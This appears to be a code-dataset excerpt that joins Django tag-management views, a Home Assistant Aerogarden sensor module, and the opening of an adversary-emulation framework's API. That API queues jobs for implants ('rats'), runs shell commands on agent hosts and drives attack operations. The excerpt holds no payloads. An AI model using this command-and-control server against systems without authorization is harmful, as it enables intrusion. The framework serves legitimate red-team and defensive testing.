"filter_param_name": "topics", } def get_queryset(self): base_results_set = Topic.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter(title__icontains=filter_form["name"]) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = Topic.objects.count() return context @user_is_staff @transaction.atomic def topic_merge(request, topic_id): topic = get_object_or_404(Topic, pk=topic_id) affected_elements = topic.works.all() count_elements = affected_elements.count() - 10 sample_elements = affected_elements[:10] context = { "merging": topic, "tag_merge_form": TopicMergeForm, "tag_category": "Topic", "merge_view": "topic_merge", "sample_elements": sample_elements, "count_elements": count_elements, } if request.method == "GET": return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = TopicMergeForm(request.POST) if raw_form.is_valid(): target_topic = raw_form.cleaned_data["into"] if topic == target_topic: """ If the user chooses the existing topic, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a topic into itself. Please select a different topic.", ) return redirect("topic_merge", topic_id=topic_id) else: old_topic_id = str(topic) merge_results = topic.merge(target_topic) messages.success( request, f"Topic {old_topic_id} has been merged into {target_topic}, and the old topic entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} topics updated" ) return redirect("topic_edit", pk=target_topic.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context) @user_is_staff @transaction.atomic def topic_multi_merge(request): context = { "tag_merge_form": TopicMultiMergeForm, "tag_category": "Topic", "multi_merge_view": "topic_multi_merge", } if request.method == "POST": raw_form = TopicMultiMergeForm(request.POST) if raw_form.is_valid(): target_topic = raw_form.cleaned_data["into"] source_topics = raw_form.cleaned_data["sources"].exclude(pk=target_topic.pk) for topic in source_topics: old_topic_id = topic.title merge_results = topic.merge(target_topic) messages.success( request, f"Topic {old_topic_id} has been merged into {target_topic}, and the old topic entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} topics updated" ) return redirect("topic_edit", pk=target_topic.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_multi_merge.html", context) class LanguageCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Language template_name = "generic_form.html" extra_context = { "form_title": "Create language", "cancel_view": "full_language_list", } fields = ["title", "code"] success_message = "Language '%(title)s' created" success_url = reverse_lazy("full_language_list") class LanguageDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Language template_name = "generic_form.html" extra_context = { "form_title": "Delete language", "cancel_view": "full_language_list", } success_message = "Language '%(title)s' deleted" success_url = reverse_lazy("full_language_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(LanguageDelete, self).delete(request, *args, **kwargs) class LanguageEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = Language template_name = "generic_form.html" extra_context = { "form_title": "Update language", "cancel_view": "full_language_list", "merge_view": "language_merge", "delete_view": "language_delete", } fields = ["title", "code"] success_message = "Language '%(title)s' updated" success_url = reverse_lazy("full_language_list") class LanguageList(LoginRequiredMixin, ListView): model = Language template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Languages", "tag_edit_view": "language_edit", "tag_create_view": "language_create", "tag_filter_form": TagForm, "tag_list_view": "full_language_list", "filter_param_name": "languages", } def get_queryset(self): base_results_set = Language.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter(title__icontains=filter_form["name"]) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = Language.objects.count() return context @user_is_staff @transaction.atomic def language_merge(request, language_id): language = get_object_or_404(Language, pk=language_id) affected_elements = language.works.all() count_elements = affected_elements.count() - 10 sample_elements = affected_elements[:10] context = { "merging": language, "tag_merge_form": LanguageMergeForm, "tag_category": "Language", "merge_view": "language_merge", "sample_elements": sample_elements, "count_elements": count_elements, } if request.method == "GET": return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = LanguageMergeForm(request.POST) if raw_form.is_valid(): target_language = raw_form.cleaned_data["into"] if language == target_language: """ If the user chooses the existing language, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a language into itself. Please select a different language.", ) return redirect("language_merge", language_id=language_id) else: old_language_id = str(language) merge_results = language.merge(target_language) messages.success( request, f"Language {old_language_id} has been merged into {target_language}, and the old language entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} languages updated" ) return redirect("language_edit", pk=target_language.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context) class WorkTypeCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView): model = WorkType template_name = "generic_form.html" extra_context = { "form_title": "Create work_type", "cancel_view": "full_work_type_list", } fields = ["title", "is_parent"] success_message = "Abstract type '%(title)s' created" success_url = reverse_lazy("full_work_type_list") class WorkTypeDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = WorkType template_name = "generic_form.html" extra_context = { "form_title": "Delete work_type", "cancel_view": "full_work_type_list", } success_message = "Abstract type '%(title)s' deleted" success_url = reverse_lazy("full_work_type_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(WorkTypeDelete, self).delete(request, *args, **kwargs) class WorkTypeEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = WorkType template_name = "generic_form.html" extra_context = { "form_title": "Update abstract type", "cancel_view": "full_work_type_list", "merge_view": "work_type_merge", "delete_view": "work_type_delete", } fields = ["title", "is_parent"] success_message = "Abstract '%(title)s' updated" success_url = reverse_lazy("full_work_type_list") class WorkTypeList(LoginRequiredMixin, ListView): model = WorkType template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Abstract Types", "tag_edit_view": "work_type_edit", "tag_create_view": "work_type_create", "tag_filter_form": TagForm, "tag_list_view": "full_work_type_list", "filter_param_name": "work_type", } def get_queryset(self): base_results_set = WorkType.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter(title__icontains=filter_form["name"]) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = WorkType.objects.count() return context @user_is_staff @transaction.atomic def work_type_merge(request, work_type_id): work_type = get_object_or_404(WorkType, pk=work_type_id) affected_elements = work_type.works.all() count_elements = affected_elements.count() - 10 sample_elements = affected_elements[:10] context = { "merging": work_type, "tag_merge_form": WorkTypeMergeForm, "tag_category": "Abstract Type", "merge_view": "work_type_merge", "sample_elements": sample_elements, "count_elements": count_elements, } if request.method == "GET": return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = WorkTypeMergeForm(request.POST) if raw_form.is_valid(): target_work_type = raw_form.cleaned_data["into"] if work_type == target_work_type: """ If the user chooses the existing work_type, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a work_type into itself. Please select a different work_type.", ) return redirect("work_type_merge", work_type_id=work_type_id) else: old_work_type_id = str(work_type) merge_results = work_type.merge(target_work_type) messages.success( request, f"WorkType {old_work_type_id} has been merged into {target_work_type}, and the old work_type entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} work_types updated" ) return redirect("work_type_edit", pk=target_work_type.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context)
true
true
f705eac2506b58ebfbb78d7b784fcf08c2440c41
4,823
py
Python
Aero_Garden.py
epotex/hagarden
da1aad8f7aa26a8fa0d13738bd124a8aa27319c5
[ "MIT" ]
2
2018-02-05T21:29:44.000Z
2021-12-13T16:38:24.000Z
Aero_Garden.py
epotex/hagarden
da1aad8f7aa26a8fa0d13738bd124a8aa27319c5
[ "MIT" ]
null
null
null
Aero_Garden.py
epotex/hagarden
da1aad8f7aa26a8fa0d13738bd124a8aa27319c5
[ "MIT" ]
2
2018-01-20T04:50:24.000Z
2020-01-20T18:53:27.000Z
import logging import urllib import requests import base64 """ HASS module to read Aerogarde bounty info, later there will be an option to control the light writen by @epotex """ _LOGGER = logging.getLogger(__name__) DOMAIN = 'aerogarden' agent = "BountyWiFi/1.1.13 (iPhone; iOS 10.3.2; Scale/2.00)" port = "8080" host = "http://ec2-54-86-39-88.compute-1.amazonaws.com:" #API Calls Login_call = "/api/Admin/Login" SetDictPushCount = "/api/CustomData/SetDictPushCount?userID=" QueryUserDevice = "/api/CustomData/QueryUserDevice" GetUserSetted = "/api/CustomData/GetUserSetted" QueryDeviceOnline = "/api/CustomData/QueryDeviceOnline" QueryDeviceStatus = "/api/CustomData/QueryDeviceStatus" UpdateDeviceConfig ="/api/CustomData/UpdateDeviceConfig" auth_data ="" encoded_mac = "" AERO_PARAMETERS = {} def base64decode(b): return base64.b64decode(b).decode('utf-8') def setup(hass, base_config): config = base_config.get(DOMAIN) encoded_email = urllib.parse.quote(config['mail']) encoded_password = urllib.parse.quote(config['password']) encoded_mac = urllib.parse.quote(config['aerogarden_mac_address']) auth_data = "mail=" + encoded_email + "&userPwd=" + encoded_password apiurl = str(host) + str(port) + str(Login_call) headers = { 'User-Agent': 'BountyWiFi/1.1.13 (iPhone; iOS 10.3.2; Scale/2.00)', "Content-Type": "application/x-www-form-urlencoded", "Connection": "keep-alive", "Accept": "*/*", "Accept-Encoding": "gzip, deflate" } try: r = requests.post(apiurl, data=auth_data, headers=headers) responce = r.json() userID =responce["code"] device_url = "airGuid=" + encoded_mac + "&userID=" + str(userID) apiurl = str(host) + str(port) + str(QueryDeviceStatus) r = requests.post(apiurl, data=str(device_url), headers=headers) garden_data = r.json() status = 'online' #extracted info config_id= garden_data['configID'] airGuid = garden_data['airGuid'] lightCycle = garden_data['lightCycle'] pumpCycle = garden_data['pumpCycle'] lightTemp = garden_data['lightTemp'] lightStat = garden_data['lightStat'] clock = garden_data['clock'] pumpStat = garden_data['pumpStat'] pumpHydro = garden_data['pumpHydro'] pumpRemind4Hour = garden_data['pumpRemind4Hour'] plantedType = garden_data['plantedType'] garden_name =base64decode(garden_data['plantedName']) totalDay = garden_data['totalDay'] plantedDay = garden_data['plantedDay'] nutriRemindDay = garden_data['nutriRemindDay'] alarmAllow = garden_data['alarmAllow'] plantedDate = garden_data['plantedDate'] nutrientDate = garden_data['nutrientDate'] updateDate = garden_data['updateDate'] createDate = garden_data['createDate'] swVersion = garden_data['swVersion'] hwVersion = garden_data['hwVersion'] bwVersion = garden_data['bwVersion'] oldPlantedDay = garden_data['oldPlantedDay'] deviceID = garden_data['deviceID'] deviceIP = garden_data['deviceIP'] except RequestException: _LOGGER.exception("Error communicating with AeroGarden") status = 'offline' return False #display extracted info hass.states.set('Aerogarden.garden_name',garden_name ) hass.states.set('Aerogarden.config_id',config_id ) hass.states.set('Aerogarden.airGuid',airGuid ) hass.states.set('Aerogarden.lightCycle',lightCycle ) hass.states.set('Aerogarden.pumpCycle',pumpCycle ) hass.states.set('Aerogarden.lightTemp',lightTemp ) hass.states.set('Aerogarden.lightStat',lightStat ) hass.states.set('Aerogarden.clock',clock ) hass.states.set('Aerogarden.pumpStat',pumpStat ) hass.states.set('Aerogarden.pumpHydro',pumpHydro ) hass.states.set('Aerogarden.pumpRemind4Hour',pumpRemind4Hour ) hass.states.set('Aerogarden.totalDay',totalDay ) hass.states.set('Aerogarden.plantedDay',plantedDay ) hass.states.set('Aerogarden.nutriRemindDay',nutriRemindDay ) hass.states.set('Aerogarden.alarmAllow',alarmAllow ) hass.states.set('Aerogarden.plantedDate',plantedDate ) hass.states.set('Aerogarden.nutrientDate',nutrientDate ) hass.states.set('Aerogarden.updateDate',updateDate ) hass.states.set('Aerogarden.createDate',createDate ) hass.states.set('Aerogarden.swVersion',swVersion ) hass.states.set('Aerogarden.hwVersion',hwVersion ) hass.states.set('Aerogarden.bwVersion',bwVersion ) hass.states.set('Aerogarden.oldPlantedDay',oldPlantedDay ) hass.states.set('Aerogarden.deviceID',deviceID ) hass.states.set('Aerogarden.deviceIP',deviceIP ) hass.states.set('Aerogarden.Status', status) return True
37.387597
93
0.695003
import logging import urllib import requests import base64 _LOGGER = logging.getLogger(__name__) DOMAIN = 'aerogarden' agent = "BountyWiFi/1.1.13 (iPhone; iOS 10.3.2; Scale/2.00)" port = "8080" host = "http://ec2-54-86-39-88.compute-1.amazonaws.com:" Login_call = "/api/Admin/Login" SetDictPushCount = "/api/CustomData/SetDictPushCount?userID=" QueryUserDevice = "/api/CustomData/QueryUserDevice" GetUserSetted = "/api/CustomData/GetUserSetted" QueryDeviceOnline = "/api/CustomData/QueryDeviceOnline" QueryDeviceStatus = "/api/CustomData/QueryDeviceStatus" UpdateDeviceConfig ="/api/CustomData/UpdateDeviceConfig" auth_data ="" encoded_mac = "" AERO_PARAMETERS = {} def base64decode(b): return base64.b64decode(b).decode('utf-8') def setup(hass, base_config): config = base_config.get(DOMAIN) encoded_email = urllib.parse.quote(config['mail']) encoded_password = urllib.parse.quote(config['password']) encoded_mac = urllib.parse.quote(config['aerogarden_mac_address']) auth_data = "mail=" + encoded_email + "&userPwd=" + encoded_password apiurl = str(host) + str(port) + str(Login_call) headers = { 'User-Agent': 'BountyWiFi/1.1.13 (iPhone; iOS 10.3.2; Scale/2.00)', "Content-Type": "application/x-www-form-urlencoded", "Connection": "keep-alive", "Accept": "*/*", "Accept-Encoding": "gzip, deflate" } try: r = requests.post(apiurl, data=auth_data, headers=headers) responce = r.json() userID =responce["code"] device_url = "airGuid=" + encoded_mac + "&userID=" + str(userID) apiurl = str(host) + str(port) + str(QueryDeviceStatus) r = requests.post(apiurl, data=str(device_url), headers=headers) garden_data = r.json() status = 'online' config_id= garden_data['configID'] airGuid = garden_data['airGuid'] lightCycle = garden_data['lightCycle'] pumpCycle = garden_data['pumpCycle'] lightTemp = garden_data['lightTemp'] lightStat = garden_data['lightStat'] clock = garden_data['clock'] pumpStat = garden_data['pumpStat'] pumpHydro = garden_data['pumpHydro'] pumpRemind4Hour = garden_data['pumpRemind4Hour'] plantedType = garden_data['plantedType'] garden_name =base64decode(garden_data['plantedName']) totalDay = garden_data['totalDay'] plantedDay = garden_data['plantedDay'] nutriRemindDay = garden_data['nutriRemindDay'] alarmAllow = garden_data['alarmAllow'] plantedDate = garden_data['plantedDate'] nutrientDate = garden_data['nutrientDate'] updateDate = garden_data['updateDate'] createDate = garden_data['createDate'] swVersion = garden_data['swVersion'] hwVersion = garden_data['hwVersion'] bwVersion = garden_data['bwVersion'] oldPlantedDay = garden_data['oldPlantedDay'] deviceID = garden_data['deviceID'] deviceIP = garden_data['deviceIP'] except RequestException: _LOGGER.exception("Error communicating with AeroGarden") status = 'offline' return False hass.states.set('Aerogarden.garden_name',garden_name ) hass.states.set('Aerogarden.config_id',config_id ) hass.states.set('Aerogarden.airGuid',airGuid ) hass.states.set('Aerogarden.lightCycle',lightCycle ) hass.states.set('Aerogarden.pumpCycle',pumpCycle ) hass.states.set('Aerogarden.lightTemp',lightTemp ) hass.states.set('Aerogarden.lightStat',lightStat ) hass.states.set('Aerogarden.clock',clock ) hass.states.set('Aerogarden.pumpStat',pumpStat ) hass.states.set('Aerogarden.pumpHydro',pumpHydro ) hass.states.set('Aerogarden.pumpRemind4Hour',pumpRemind4Hour ) hass.states.set('Aerogarden.totalDay',totalDay ) hass.states.set('Aerogarden.plantedDay',plantedDay ) hass.states.set('Aerogarden.nutriRemindDay',nutriRemindDay ) hass.states.set('Aerogarden.alarmAllow',alarmAllow ) hass.states.set('Aerogarden.plantedDate',plantedDate ) hass.states.set('Aerogarden.nutrientDate',nutrientDate ) hass.states.set('Aerogarden.updateDate',updateDate ) hass.states.set('Aerogarden.createDate',createDate ) hass.states.set('Aerogarden.swVersion',swVersion ) hass.states.set('Aerogarden.hwVersion',hwVersion ) hass.states.set('Aerogarden.bwVersion',bwVersion ) hass.states.set('Aerogarden.oldPlantedDay',oldPlantedDay ) hass.states.set('Aerogarden.deviceID',deviceID ) hass.states.set('Aerogarden.deviceIP',deviceIP ) hass.states.set('Aerogarden.Status', status) return True
true
true
f705eb236c6300bef2b2f2d6d212f2afda2a2e89
37,473
py
Python
caldera/app/api.py
omitroom13/caldera
7153f77941b9fe48d40850a49b8e252d251a4690
[ "Apache-2.0", "CC0-1.0" ]
null
null
null
caldera/app/api.py
omitroom13/caldera
7153f77941b9fe48d40850a49b8e252d251a4690
[ "Apache-2.0", "CC0-1.0" ]
null
null
null
caldera/app/api.py
omitroom13/caldera
7153f77941b9fe48d40850a49b8e252d251a4690
[ "Apache-2.0", "CC0-1.0" ]
null
null
null
import asyncio from datetime import datetime, timezone from functools import wraps import traceback import inspect import logging import ujson as json_module import hashlib import yaml from aiohttp import web import aiohttp import mongoengine import os from .engine.objects import Operation, Network, Domain, Log, ObservedHost, TechniqueMapping, Job, Rat, Host, \ ObservedRat, Adversary, CodedStep, ActiveConnection, Agent, AttackTechnique, AttackTactic, SiteUser, Setting, \ Opcodes, Artifactlist, ObservedFile, AttackList, JobException, ObservedSchtask, ObservedProcess, AttackGroup from .engine.objects import ObservedDomain, ObservedOSVersion, ObservedUser, ObservedShare, ObservedCredential, \ ObservedService, ObservedTimeDelta, ObservedRegKey, ObservedPersistence from . import authentication as auth from .engine.database import native_types from . import ddp from . import attack from . import util from . import interface from . import extern log = logging.getLogger(__name__) routes = [] def api(uri, methods, objects=None, get=None, auth_group=None, headers=None): """This is a decorator for web api endpoints Args: uri: The URI for the API, can contain keywords denoted by '{}' which indicate objects: a list of tuples methods: the list of HTTP methods this API accepts auth_group: the group that the token must be in for access to this API headers: A list of headers to return with the Response """ if objects is None: objects = {} if get is None: get = {} if auth_group is None: auth_group = [] if headers is None: headers = {} def decorator(f): @wraps(f) async def decorated(req, token, url_match): kwargs = {} # Map id to object for name, _class in objects.items(): if name in url_match: # If this fails and the request type is 'GET', # then an exception should be returned try: kwargs[name] = _class.objects.with_id(url_match[name]) if kwargs[name] is None: return web.HTTPBadRequest() except (mongoengine.errors.ValidationError, ): # The client has sent an invalid id in the URL return web.HTTPBadRequest() # Now set the default get parameters # For cases where we see args like ?arg1=value1&arg2&... # arg2 is set to '' # but change it to True instead trueified = {k: True if v == '' else v for k, v in req.GET.items()} for k, v in get.items(): kwargs[k] = trueified.get(k, v) sig = inspect.signature(f) if 'token' in sig.parameters: kwargs['token'] = token # Finally format the output as json (or jsonfm) results = await f(req, **kwargs) if isinstance(results, web.StreamResponse): return results else: json = json_module.dumps(native_types(results), sort_keys=True, indent=4) return web.Response(text=json, content_type='application/json', headers=headers) async def entrypoint(req): host = None try: # ensure this member is authorized token = auth.Token(req.cookies.get('AUTH')) l = [g for g in auth_group if token.in_group(g)] if len(l) == 0: raise auth.NotAuthorized() # active connections peername = req.transport.get_extra_info('peername') if peername is not None: host_ip, port = peername if req.host: local_ip = req.host.split(":")[0] if local_ip == "localhost": local_ip = "127.0.0.1" else: local_ip = "127.0.0.1" token_host = None if token.in_group('agent'): agent = Agent.objects.with_id(token.session_info['_id']) if agent is None: raise auth.NotAuthorized agent.modify(**{'alive': True}) token_host = agent.host host = ActiveConnection.objects(ip=host_ip, host=token_host, local_ip=local_ip).first() if host is None: host = ActiveConnection(ip=host_ip, host=token_host, local_ip=local_ip, connections=0).save() host.update(inc__connections=1) resp = await decorated(req, token, req.match_info) return resp except auth.NotAuthorized: return web.HTTPForbidden() except Exception: traceback.print_exc() results = {'error': 'exception in ' + f.__name__} output = json_module.dumps(results, sort_keys=True, indent=4) return web.HTTPInternalServerError(text=output, content_type='application/json') finally: if host: host.update(dec__connections=1) for method in methods: routes.append((method, uri, entrypoint)) return decorated return decorator def websocket(uri, auth_group=None): if auth_group is None: auth_group = [] def decorator(f): @wraps(f) async def entrypoint(req): try: # ensure this member is authorized token = auth.Token(req.cookies.get('AUTH')) l = [g for g in auth_group if token.in_group(g)] if len(l) == 0: raise auth.NotAuthorized() return await f(req) except auth.NotAuthorized: return web.HTTPForbidden() except Exception: traceback.print_exc() results = {'error': 'exception in ' + f.__name__} output = json_module.dumps(results, sort_keys=True, indent=4) return web.HTTPInternalServerError(text=output, content_type='application/json') routes.append(('GET', uri, entrypoint)) return entrypoint return decorator # Example usage: # GET /api/jobs # POST /api/jobs { 'action': 'install_service', 'host': 'mm198673-pc', ... } @api('/api/jobs', methods=['GET', 'POST'], get={'status': None, 'wait': False}, auth_group=['human', 'agent']) async def query_jobs(request, token, status, wait): if request.method == 'GET': query = {} if status: query['status'] = status if token.in_group('agent'): agent = Agent.objects.with_id(token.session_info['_id']) if not agent: raise auth.NotAuthorized() # are there any jobs for this agent? query.update({'agent': agent.id}) jobs = list(Job.objects(**query)) if not len(jobs) and wait is not False: # Now wait for jobs to be created try: jobs = [(await Job.wait_next(query))] except asyncio.CancelledError: return else: jobs = list(Job.objects(**query)) if not len(jobs) and wait is not False: jobs = [(await Job.wait_next(query))] return jobs elif request.method == 'POST': # only humans are allowed to create new jobs token.require_group('human') json = await request.json() return Job(**json).save().id # Example usage: # GET /api/jobs/<job> # POST /api/jobs/<job> { 'action': 'install_service', 'host': 'mm198673-pc', ... } @api('/api/jobs/{job}', methods=['GET', 'PUT', 'DELETE'], objects={'job': Job}, auth_group=['human', 'agent']) async def query_job(request, token, job): if request.method == 'GET': if token.in_group('agent'): # can only get jobs that are not completed and are for them if job['status'] in ("created", "pending") and str(job.agent.id) == token.session_info['_id']: return job else: raise auth.NotAuthorized() else: return job elif request.method == 'PUT': if token.in_group('agent'): # can only put jobs that are not completed and are for them if job.status in ("created", "pending") and str(job.agent.id) == token.session_info['_id']: json = await request.json() # whitelist legal fields if 'result' in json['action']: job['action']['result'] = json['action']['result'] if 'error' in json['action']: job['action']['error'] = json['action']['error'] if 'exception' in json['action']: job['action']['exception'] = json['action']['exception'] job['status'] = json.get('status', job.status) if job['status'] == "failed" and 'error' in job['action'] and job['action']['error'] == "no client": # Force update the clients list interface.get_clients(job.agent.host) # find the rat try: iv_name = job['action']["rats"]["args"][0] iv = Rat.objects(agent=job.agent, name=iv_name) iv.modify(**{'active': False}) except KeyError: log.warning("Could not find rat to remove for failed job") return job.save() else: raise auth.NotAuthorized() else: # human # Update the job json = await request.json() if json['create_time']: json['create_time'] = datetime.strptime(json['create_time'], "%Y-%m-%dT%H:%M:%S.%f") return job.save() elif request.method == 'DELETE': token.require_group('human') return job.delete() # Example usage: # POST /api/clients @api('/api/clients', methods=['POST'], auth_group=['agent']) async def query_clients(request, token): json = await request.json() # pid, elevated, executable_path agen = Agent.objects.with_id(token.session_info['_id']) # Get the list of known rats complete_names = {iv.name: iv for iv in Rat.objects(host=agen.host)} # Filter list for living rats known_names = {} for name, element in complete_names.items(): if element.active: known_names[name] = element # All of the currently running rats, as returned by the job active = {x['pid']: x for x in json} # Enumerate the active rats, and delete dead ones for name, iv in known_names.items(): if name not in active: iv.modify(**{'active': False}) else: a = active.pop(name) iv.update(**{'elevated': a['elevated'], 'executable': a['executable_path']}) # Any new rats need to be added for name in active: Rat(**{'agent': agen, 'host': agen.host, 'name': name, 'elevated': active[name]['elevated'], 'executable': active[name]['executable_path'], 'username': active[name]['username'].lower(), 'active': True}).save() return None # Example usage: # GET /api/networks # POST /api/networks { domain: 'mitre.org' } @api('/api/networks', methods=['GET', 'POST'], auth_group=['human']) async def query_networks(request): if request.method == 'GET': return Network.objects elif request.method == 'POST': json = await request.json() network = Network(**json).save() return network.id @api('/api/networks/{network}', methods=['GET', 'DELETE'], objects={'network': Network}, auth_group=['human']) async def query_network(request, network): if request.method == 'GET': return network elif request.method == 'DELETE': network.delete() @api('/api/heartbeat', methods=['GET'], auth_group=['agent']) async def agent_check_in(request, token): agen = Agent.objects.with_id(token.session_info['_id']) agen.modify(**{'check_in': datetime.now(timezone.utc), 'alive': True}) return True @api('/api/hosts', methods=['GET'], auth_group=['human']) async def query_hosts(request): return Host.objects @api('/api/domains', methods=['GET'], auth_group=['human']) async def query_domains(request): return Domain.objects @api('/api/domains/{domain}', methods=['GET'], objects={'domain': Domain}, auth_group=['human']) async def query_domain(request, domain): return domain @api('/api/domains/{domain}/hosts', methods=['GET'], objects={'domain': Domain}, auth_group=['human']) async def query_domainhosts(request, domain): return Host.objects(domain=domain) @api('/api/networks/{network}/hosts', methods=['GET'], objects={'network': Network}, auth_group=['human']) async def query_networkhosts(request, network): return network.hosts @api('/api/networks/{network}/hosts/{host}', methods=['GET', 'PUT', 'DELETE'], objects={'network': Network, 'host': Host}, auth_group=['human']) async def query_networkhosthosts(request, network, host): if request.method == 'GET': return host elif request.method == 'PUT': network.modify(push__hosts=host) elif request.method == 'DELETE': network.modify(pull__hosts=host) @api('/api/hosts/{host}/commands', methods=['GET', 'POST'], objects={'host': Host}, auth_group=['human']) async def query_commands(request, host): if request.method == 'GET': if 'hostname' in request.GET: hosts = Host.objects(hostname=request.GET['hostname']) return [x.host_command_result() for x in Job.objects(host__in=hosts)] else: return [x.host_command_result() for x in Job.objects(host=host)] elif request.method == 'POST': json = await request.json() return interface.agent_shell_command(host, json['command_line']).id @api('/api/hosts/{host}/commands/{job}', methods=['GET'], get={'wait': False}, objects={'host': Host, 'job': Job}, auth_group=['human']) async def query_command(request, wait, host, job): # start waiting for the job before reloading to avoid missing the update if wait is not False: try: await job.wait_till_completed() except JobException as e: log.warning(e.args) return job.host_command_result() @api('/api/rats', methods=['GET'], auth_group=['human']) async def query_ivs(request): query = {k: v for k, v in request.GET.items() if k == 'hostname'} return Rat.objects(**query) @api('/api/rats/{rat}', methods=['GET'], objects={'rat': Rat}, auth_group=['human']) async def query_iv(rat): return rat @api('/api/rats/{rat}/commands', methods=['GET', 'POST'], objects={'rat': Rat}, auth_group=['human']) async def query_ivcommands(request, rat): if request.method == 'GET': return [x.rat_command_result() for x in Job.objects(agent=rat.agent)] elif request.method == 'POST': json = await request.json() return Job.create_rat_command(rat, json["function"], **json["parameters"]).id @api('/api/rats/{rat}/commands/{job}', methods=['GET'], get={'wait': False}, objects={'rat': Rat, 'job': Job}, auth_group=['human']) async def query_ivcommand(request, wait, rat, job): # start waiting for the job before reloading to avoid missing the update if wait is not False: try: await job.wait_till_completed() except JobException as e: log.warning(e.args) return job.rat_result() @api('/api/operations', methods=['GET'], auth_group=['human']) async def query_operations(request): return Operation.objects @api('/api/opcodes', methods=['GET'], auth_group=['human']) async def get_opcodes(request): return Opcodes.arguments @api('/api/networks/{network}/operations', methods=['GET', 'POST'], objects={'network': Network}, auth_group=['human']) async def query_perations(request, network): if request.method == 'GET': return list(Operation.objects(network=network)) elif request.method == 'POST': json = await request.json() if json['start_type'] == 'existing' and 'start_rat' not in json: return None json['network'] = network json['status'] = 'start' json['status_state'] = '' json['log'] = Log().save() # Get the adversary adversary = Adversary.objects.with_id(json['adversary']) json['steps'] = [x.name for x in adversary.steps] operation = Operation(**json).save() return operation.id @api('/api/networks/{network}/operations/{operation}', methods=['GET', 'PUT', 'DELETE', 'PATCH'], get={'wait': False}, objects={'network': Network, 'operation': Operation}, auth_group=['human']) async def query_operation(request, network, operation, wait): if request.method == 'GET': if wait: wait = json_module.loads(wait) wait["id"] = operation.id log.info("Wait: {}".format(wait)) # TODO fix race condition here new = list(Operation.objects(**wait)) if len(new) == 0: del wait["id"] new = [await operation.wait(wait)] return new[0] return operation elif request.method == 'PUT': json = await request.json() json['network_id'] = network.id json['hosts'] = network.hosts return operation.update(**json) elif request.method == 'DELETE': return operation.delete() elif request.method == 'PATCH': json = await request.json() operation.update(__raw__={'$set': json}) @api('/api/agents', methods=['GET'], auth_group=['human']) async def query_agents(request): return Agent.objects @api('/api/logs', methods=['GET'], auth_group=['human']) async def query_logs(request): return Log.objects @api('/api/logs/{log}', methods=['GET'], objects={'log': Log}, auth_group=['human']) async def query_log(request, log): return log @api('/api/agents/{agent}', methods=['GET'], objects={'agent': Agent}, auth_group=['human']) async def query_agent(request, agent): return agent @api('/api/adversaries', methods=['GET', 'POST'], auth_group=['human']) async def query_adversaries(request): if request.method == 'GET': return Adversary.objects elif request.method == 'POST': json = await request.json() json['artifactlists'] = [Artifactlist.objects.with_id(x) for x in json['artifactlists']] json['steps'] = [CodedStep.objects.with_id(x) for x in json['steps']] return Adversary(**json).save().id @api('/api/adversaries/{adversary}', methods=['GET', 'PUT', 'DELETE'], objects={'adversary': Adversary}, auth_group=['human']) async def query_adversary(request, adversary): if request.method == 'GET': return adversary elif request.method == 'PUT': if (adversary.protected): new_adv = {} new_adv['name'] = adversary['name'] new_adv['steps'] = adversary['steps'] new_adv['exfil_method'] = adversary['exfil_method'] new_adv['exfil_port'] = adversary['exfil_port'] new_adv['exfil_address'] = adversary['exfil_address'] new_adv['artifactlists'] = adversary['artifactlists'] adversary = Adversary(**new_adv).save() # Update the adversary json = 